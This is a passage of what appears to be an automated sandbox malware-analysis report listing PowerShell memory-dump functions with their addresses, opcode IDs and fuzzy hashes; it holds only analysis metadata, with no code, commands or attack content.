                                                                                                                                                                                          Function 00007FFD34980B44 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2329378938.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1320a15184628fd84dfa4f08e18db2d7af5b68bdb466e71c2bdc174f02abea27
                                                                                                                                                                                          • Instruction ID: 545e11f6bdcc0c35dc108c0c1777c9fd829283a60cfb2af46c81d7dcb710b4b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1320a15184628fd84dfa4f08e18db2d7af5b68bdb466e71c2bdc174f02abea27
                                                                                                                                                                                          • Instruction Fuzzy Hash: CA01F532F0EB454FEBADA65C54A60B872D1FF8625474500BEE14DC31A7DD2EAC059200
                                                                                                                                                                                          Function 00007FFD348B4195 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2328846814.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd348b0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                          • Instruction ID: 5e2e1d49d45fb6b89b0fa391f2236679d183cf699ff5fb0ffebb47dcbf80b9fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6401A73020CB0C4FD744EF4CE051AA5B3E0FB99320F10052DE58AC3665DA36E881CB41

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00007FFD349906A5 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2479081991.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd34990000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 43cb578ce7550646a1b5ff006ae9206e8051b3484cac66d10d54d14a6a07693b
                                                                                                                                                                                          • Instruction ID: 45967c32e0324941d0557a333ee1374e97b3d4609597a7977a858f9f681df96a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 43cb578ce7550646a1b5ff006ae9206e8051b3484cac66d10d54d14a6a07693b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41E12622B0EBC51FE756973858A51A47FE0EF93310B0901FFD299CB1A7D91DA806D361
                                                                                                                                                                                          Function 00007FFD34990781 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2479081991.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd34990000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d359eb80b36f8a1cd514f94e646c383f9fbaf8c1cfa42855856b632673e92a51
                                                                                                                                                                                          • Instruction ID: c68a75e0103e47e402f94dea2572e3de59b1443b5559f98f867da164757be3d8
                                                                                                                                                                                          • Opcode Fuzzy Hash: d359eb80b36f8a1cd514f94e646c383f9fbaf8c1cfa42855856b632673e92a51
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F413821B0DA894FE755872888A56B03BE1EF47310F0A01FED25DC7197DA2EEC06D7A1
                                                                                                                                                                                          Function 00007FFD3499099B Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2479081991.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd34990000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 07f399bf2c0dad9afeafcc7e20995875f1a14ea69ecaae492e613e93fac270e8
                                                                                                                                                                                          • Instruction ID: 918f78a2d2ddd8bd1d3510fec61beb140ba7924efc7650cd3f45345cfdb5fc03
                                                                                                                                                                                          • Opcode Fuzzy Hash: 07f399bf2c0dad9afeafcc7e20995875f1a14ea69ecaae492e613e93fac270e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE418811A4E3C10FE357977858B92A83FE1AF43210B4A41FED1D9CB0A3D95D184AD722
                                                                                                                                                                                          Function 00007FFD34993444 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2479081991.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd34990000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 24ba06486b18498528b41da7a6ec1059a7bbc8edfc805efbc08cf5097ab3e9d3
                                                                                                                                                                                          • Instruction ID: 09c57cd771b31e2dc24874c2f766850ee73e25ae63c30cab6faf10ea39561a9f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 24ba06486b18498528b41da7a6ec1059a7bbc8edfc805efbc08cf5097ab3e9d3
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC311332B0C9494FEBA5EA9C94E16B8B7E2EF5E314B1800BEC54DC7197DA29A801D351
                                                                                                                                                                                          Function 00007FFD348C3FF2 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2478337487.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd348c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ada08be83535d9c5fb9b63da0f69311ad1555ae6a3773b7ef63854b63dce297d
                                                                                                                                                                                          • Instruction ID: be2343238b93ded7deef4386abff89ecc25af249ed14c5780778da40d4fd4506
                                                                                                                                                                                          • Opcode Fuzzy Hash: ada08be83535d9c5fb9b63da0f69311ad1555ae6a3773b7ef63854b63dce297d
                                                                                                                                                                                          • Instruction Fuzzy Hash: AD31F663F0D98A0BE791B76CA5B61EE7BE0EF56720B0800B3D649C7193DD2C6C468745
                                                                                                                                                                                          Function 00007FFD348C4196 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2478337487.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd348c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5f70267e25e31b351b46bf4775a64eb5b0cae67f2b0c39e8ea72982b9a681cb1
                                                                                                                                                                                          • Instruction ID: bd35847e1ac50581db73634ecfda9ca20862fd26c2ca5d455561e01b0b27cf7f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f70267e25e31b351b46bf4775a64eb5b0cae67f2b0c39e8ea72982b9a681cb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B017972F0CA1C4BE75C9A4C74961B9B3D1E799634F01027FE18FC3292DE156C535586
                                                                                                                                                                                          Function 00007FFD348C4182 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2478337487.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd348c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: aab5155464b63a1ba08cc9ec0ec510a3ddd68299b2c631d8acf4f93139c4643d
                                                                                                                                                                                          • Instruction ID: 8ef295384e2f867b3e1689c7d4b129848679b384cda9570216d9401c1c40a6f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: aab5155464b63a1ba08cc9ec0ec510a3ddd68299b2c631d8acf4f93139c4643d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60015672F0CA184BE75C5A4C74921B9B3D1E799724F00027FE58FC3292DE1A6C435586
                                                                                                                                                                                          Function 00007FFD348C41A7 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2478337487.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd348c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 7d5a91e3b8a60a3942b48b7ff2ebff1489928d49602a81e2a6061b716937f7d7
                                                                                                                                                                                          • Instruction ID: 241fe51ef83ad91e809dcdc00bce7d5b138fe1783d155219e5ee00a5a8bd1ffa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d5a91e3b8a60a3942b48b7ff2ebff1489928d49602a81e2a6061b716937f7d7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E017572F0CA1C0BE75C5A4C68961B9B3D1E799634F00027FE18FC3292DE25AC435686
                                                                                                                                                                                          Function 00007FFD3499346A Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2479081991.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd34990000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 61197d5250601cc76a0beefca6e3eb009c2a82633653dac4bfc65d0445ad3cd2
                                                                                                                                                                                          • Instruction ID: e80738d3f10987af013711452a87c7bce21f93e5d3e63af36ffba0e387471da8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 61197d5250601cc76a0beefca6e3eb009c2a82633653dac4bfc65d0445ad3cd2
                                                                                                                                                                                          • Instruction Fuzzy Hash: F311C631F0D6494FEB76DE9880E517867E2EF5E315F1900BEC14DD7197DA2DA8058311
                                                                                                                                                                                          Function 00007FFD348C33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2478337487.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd348c0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9012389c5d5d61f123a0134075156eea11aa2eabdd9b95c29ad039b298ad7b13
                                                                                                                                                                                          • Instruction ID: bd047773c0eba2039cb01fe63577d77a598f3d7d22b04674929b2521223c22b2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9012389c5d5d61f123a0134075156eea11aa2eabdd9b95c29ad039b298ad7b13
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8401677121CB0D4FD744EF4CE491AA6B7E0FB99364F10056EE58AC3651DA36E882CB45